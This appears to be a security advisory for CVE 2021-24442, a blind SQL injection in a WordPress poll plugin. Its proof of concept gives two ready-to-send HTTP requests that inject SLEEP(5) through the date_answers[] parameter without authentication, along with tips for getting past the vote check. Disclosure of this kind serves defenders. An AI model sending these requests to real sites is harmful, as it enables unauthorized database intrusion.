Poll, Survey, Questionnaire and Voting system < 1.5.3 – Unauthenticated Blind SQL Injection | CVE 2021-24442

Description

The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks

Proof of Concept

v < 1.5.3

POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done]
Cookie: [any user, authenticated or not]
Connection: close

question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)

v < 1.5.1

POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Cookie: [any user, authenticated or not]
Connection: close

question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)